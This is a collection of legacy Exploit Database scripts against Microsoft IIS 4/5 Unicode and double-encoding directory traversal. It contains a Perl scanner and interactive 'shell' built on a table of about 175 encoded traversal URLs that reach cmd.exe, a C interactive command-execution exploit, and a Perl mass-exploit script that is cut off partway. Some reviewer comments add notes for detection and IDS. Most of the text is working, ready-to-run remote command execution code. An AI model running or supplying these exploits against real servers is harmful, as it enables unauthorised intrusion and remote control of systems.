$U[257] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[258] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[259] = "/cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[260] = "/cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[261] = "/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[262] = "/cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[263] = "/cgi-bin..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[264] = "/cgi-bin/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[265] = "/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[266] = "/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[267] = "/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[268] = "/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[269] = "/cgi-bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[270] = "/cgi-bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[271] = "/cgi-bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[272] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[273] = "/cgi-bin/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[274] = "/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[275] = "/cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[276] = "/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[277] = "/cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[278] = "/cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[279] = "/cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[280] = "/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[281] = "/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[282] = "/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[283] = "/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[284] = "/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[285] = "/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[286] = "/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[287] = "/cgi-bin/root.exe?/c+";
$U[288] = "/cgi-bin/cmd.exe?/c+";
$U[289] = "/cgi-bin/sensepost.exe?/c+";
$U[290] = "/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[291] = "/cgi-bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[292] = "/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[293] = "/cgi-bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[294] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[295] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[296] = "/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[297] = "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[298] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[299] = "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[300] = "/includes/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[301] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[302] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[303] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[304] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[305] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[306] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[307] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[308] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[309] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[310] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[311] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[312] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[313] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[314] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[315] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[316] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[317] = "/msadc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[318] = "/msadc/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[319] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[320] = "/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[321] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[322] = "/msadc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[323] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[324] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt./system32/cmd.exe?/c+";
$U[325] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[326] = "/msadc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[327] = "/msadc/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[328] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[329] = "/msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[330] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[331] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[332] = "/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[333] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[334] = "/msadc/..%c1%9c/winnt/system32/cmd.exe?/c+";
$U[335] = "/msadc/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+";
$U[336] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[337] = "/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[338] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[339] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[340] = "/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[341] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[342] = "/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[343] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[344] = "/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[345] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[346] = "/msadc/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+";
$U[347] = "/msadc/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+";
$U[348] = "/msadc/..%u002e..%u002e/winnt/system32/cmd.exe?/c+";
$U[349] = "/msadc/..%u002f..%u002fwinnt/system32/cmd.exe?/c+";
$U[350] = "/msadc/..%u005c..%u005cwinnt/system32/cmd.exe?/c+";
$U[351] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$U[352] = "/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[353] = "/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[354] = "/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[355] = "/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[356] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?./c+";
$U[357] = "/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[358] = "/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[359] = "/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[360] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[361] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[362] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[363] = "/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[364] = "/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[365] = "/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[366] = "/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[367] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[368] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[369] = "/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[379] = "/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[371] = "/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[372] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[373] = "/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+";
$U[374] = "/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[375] = "/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[376] = "/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$U[377] = "/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[378] = "/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[379] = "/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[380] = "/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[381] = "/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[382] = "/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[383] = "/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[384] = "/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[385] = "/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[386] = "/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[387] = "/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[388] = "/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[389] = "/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[390] = "/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+";
$U[391] = "/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+";
$U[392] = "/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[393] = "/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[394] = "/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[395] = "/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[396] = "/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[397] = "/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[398] = "/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[399] = "/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[400] = "/_vti_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[401] = "/_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[402] = "/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[403] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$U[404] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[405] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[406] = "/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[407] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[408] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[409] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[410] = "/_vti_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[411] = "/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[412] = "/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[413] = "/_vti_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[414] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[415] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$U[416] = "/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[417] = "/_vti_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[418] = "/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[419] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[420] = "/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+";
$U[421] = "/_vti_bin/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[422] = "/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[423] = "/_vti_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[424] = "/_vti_bin/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[425] = "/_vti_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[426] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[427] = "/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[428] = "/_vti_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[429] = "/iisadmpwd/cmd.exe?/c+";
$U[430] = "/iisadmpwd/cmd1.exe?/c+";
$U[431] = "/iisadmpwd/root.exe?/c+";
$U[432] = "/iisadmpwd/sensepost.exe?/c+";
# Main flow: banner and prompts, banner check, full sweep of the table,
# URL selection, interactive loop, sign-off. &server, &scan and &command
# may each leave early through &exit. In server access logs this shows up
# as one "HEAD /" followed at once by a burst of GET requests to the same
# host, one per table entry.
&intro;
&scan;
&choose;
&command;
&exit;
# Start-up sequence: print the help text, prompt for host and port, then
# run the banner check and pause for three seconds.
sub intro {
&help;
&host;
&server;
sleep 3;
};
# Prompt for the target host and port on STDIN and store them in the
# file-scope globals $host and $port. An empty host becomes 127.0.0.1;
# a port that is empty or contains any non-digit becomes "80".
sub host {
    print "\nHost or IP : ";
    chomp($host = <STDIN>);
    $host = "127.0.0.1" if $host eq "";

    print "\nPort (enter to accept 80): ";
    chomp($port = <STDIN>);
    # non-numeric input and an empty line both fall back to the default port
    $port = "80" if $port =~ /\D/;
    $port = "80" if $port eq "";
};
# Banner check: with $probe set to "string", &connect sends "HEAD /" and
# the first eleven captured lines of @results are searched for "IIS". If
# none matches, the user is asked whether to continue; an answer containing
# "N" (any case) leaves through &exit, anything else carries on.
sub server {
my $X;
# crude screen clear
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nGet IIS string ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
# only @results[0..10] are inspected
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/IIS/){ $webserver = "iis" };
};
};
if ($webserver ne "iis"){
print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING.";
print "\nThis Server may not be running Micro\$oft IIS WebServer";
print "\n\n\nContinue anyway? ... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "\n\nOK";
};
};
# Sweep the table: for each $U[1..$#U] send "GET $url" plus the command
# "dir" through &connect ($probe = "scan") and treat a response line
# containing "Directory" as a hit. One status line is printed per entry;
# if nothing matched the script leaves through &exit.
#
# Detection note: every request path here is an encoded ".." run followed
# by winnt/system32/cmd.exe. The table depends on double-encoded (%25..)
# and overlong UTF-8 (%c0%af, %e0%80%af, ...) spellings of "/" and "\", so a
# WAF/IDS rule only catches it reliably if it canonicalises (fully decodes)
# the path before matching.
sub scan {
my $status = "not_vulnerable";
# crude screen clear
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nScanning $host on port $port ...";
my $loop;
my $output;
my $flag;
# the same harmless listing command is appended to every table entry
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
$flag = "1";
$status = "vulnerable";
};
};
if ($flag eq "0") {
print "\nNo URL $loop...";
}else{
print "\a\a\a\n$host VULNERABLE TO URL $loop !!!";
};
};
if ($status eq "not_vulnerable"){
print "\n\n
SORRY $host is NOT Vulnerable to this Exploit.";
&exit;
};
};
# Ask for a table index on STDIN. Out-of-range or non-numeric input
# re-prompts by calling &choose again; 0 hands off to &other so the user
# can type a prefix into $U[0]. $url is then taken from the table and echoed.
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "\nURL: HTTP://$host$url";
};
# Read a user-supplied request-path prefix from STDIN into $U[0]; the
# prompt shows the expected shape (path without the trailing command).
sub other {
print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
print "\nHTTP://$host";
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
# Interactive loop. Each STDIN line is checked (case-insensitively, anywhere
# in the line) for the keywords quit / url / scan / help, which dispatch to
# &exit, &choose, &scan and &help respectively. Whitespace in the line is
# then replaced by "+", the resulting request is echoed, and unless the
# line matched one of the keywords it is sent through &connect with
# $probe = "command". The loop condition re-tests for "quit" as well.
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\nCommand :";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
# Open one TCP connection to $host:$port (the script dies if that fails)
# and send a single request selected by $probe: "scan" and "command" send
# a GET for $url$command, "string" sends "HEAD /". Both are HTTP/1.1 with a
# Host header. The reply is captured into @results; note that the while
# condition reads and discards the first line (the status line) before the
# list-context read slurps the rest, so @results never holds it. For the
# "command" and "string" probes the capture is then printed by &output.
# Called as &connect throughout, since connect is also a Perl builtin.
sub connect {
my $connection = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};
# first line consumed by the condition, remainder stored
while ( <$connection> ) {
@results = <$connection>;
};
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
# Print the lines collected in the global @results, one per second.  For a
# "string" probe only the first eleven slots (indices 0..10) are shown;
# for every other probe the whole reply is printed.
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
my $X;
for ($X=0; $X<=10; $X++) {
$display = $results[$X];
# Replies shorter than eleven lines leave the remaining slots undefined.
if (defined $display){print "$display";};
sleep 1;
};
}else{
foreach $display (@results){
print "$display";
sleep 1;
};
};
};
sub exit{
# Print the sign-off banner and terminate.  Callers reach this sub with the
# explicit &exit form; the bare "exit" on the last line is presumably the
# Perl builtin, which a user sub of the same name does not override.
print "\n\n\n
ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
# Print the banner and the list of prompts and commands.  This listing
# ends without the sub's closing brace; the original source presumably
# closes it right after the last print.
# Blank lines stand in for a clear-screen.
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com";
print "\n
https://www.securityfocus.com/bid/1806/exploit/
";
print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL.";
print "\n
note.. web directory is normally c:\\Inetpub\\wwwroot";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n port: 80 (normally) or other (like https) (RETURN for 80)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n";
Exploit Database EDB-ID : 189
Publication date : 2000-11-17 23h00 +00:00
Author : incubus
EDB Verified : Yes
/* iisex iis exploit (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <
[email protected]>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv){
/*
 * Interactive loop: read a command line from stdin, turn spaces into '+',
 * embed it in the "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+"
 * traversal request to port 80 of argv[1], and print whatever comes back.
 *
 * Reviewer notes, from a defensive reading of this listing:
 *  - gets() reads an unbounded line into the 500-byte buf, and nothing on
 *    the path into buffy checks a length either.
 *  - the whole 666-byte buffy array is sent, not just the request string,
 *    so whatever follows the terminator on the stack goes on the wire.
 *  - the reply buffer is printed with %s without ever being terminated.
 *  - close() is used without <unistd.h>, so it is implicitly declared.
 *  - the "%c0%af" traversal plus the cmd.exe path in the request line is
 *    the substring to alert on in web server logs and IDS rules.
 */
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("try %s www.server.com\n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
printf ("by incubus <
[email protected]>\n\n");
exit(0);
}
printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n");
printf ("act like a cmd.exe kiddie, type quit to quit.\n");
for (;;)
{
printf ("\n[enter cmd> ");
/* gets() stores the line without its '\n' and with no length bound. */
gets(buf);
/* Any line containing "quit" ends the session. */
if (strstr(buf, "quit")) exit(0);
i=0;
/*
 * Space (32) -> '+' (43).  The stop condition is '\n', which gets() does
 * not store, so the scan continues past the string's terminator until a
 * newline byte happens to be found in memory.
 */
while (buf[i] != '\n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
/* Name resolution is repeated for every command. */
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}
/* name is never zeroed; only family, port and address are assigned. */
name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
/* The socket() result is checked only after connect() has used it. */
if (sock < 0){
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0\n\n");
/* sizeof(buffy) is 666: the full array is sent, not strlen(buffy) bytes. */
send(sock, buffy, sizeof(buffy), 0);
/* The recv() return value is ignored and rcvbuf is not NUL-terminated. */
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}
// milw0rm.com [2000-11-18]
Exploit Database EDB-ID : 191
Publication date : 2000-11-17 23h00 +00:00
Author : steeLe
EDB Verified : Yes
#!/usr/bin/perl
#
# IIS 4.0/5.0 Unicode Exploit
# Checks for each script that has been posted on the BugTraq Lis
# Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others
# Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will
# log sites in the log_unicode.log.
# So Simple
# Use Socket
use Socket;
# incase no arguements or less arguements are given
# (@ARGV == '0' numifies the string '0'; the "< 2" test is the one that matters.)
if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n".
"Programmed by SteeLe\n".
"Usage: ./$0 <single host> <dir for exploit>\n"; }
# Variables
# $blah: a host name, or the path of a file listing one host per line.
# $dir:  the directory passed to "dir" on the server (second argument).
$blah = $ARGV[0];
$port = 80;
$dir = $ARGV[1];
$timeout = 4;
# see if file is there,
if (-e "$blah") {
open(T, "$blah") || die "can't open $blah\n";
@target = <T>;
close(T);
}
else { @target[0] = $blah; } # what you think is blah
# all scripts mentioned on bugtraq, we know rfp knows more.
# Candidate encodings for the "/" in the traversal; one request per entry.
@scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..",
"..%c1%pc.."); # blah, i know i'm not l33t
# Open LOG Script
# Hits are appended to log_unicode.log in the current directory.
open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n";
# Socket Stuff
# One forked child per (encoding, host) pair; the parent never wait()s on
# them and moves straight on.  $submit and $ouch are globals read by
# sub connect.  Note the request terminator bytes are "\n\r\n\r".
# If fork() fails (presumably returning undef) the parent itself runs
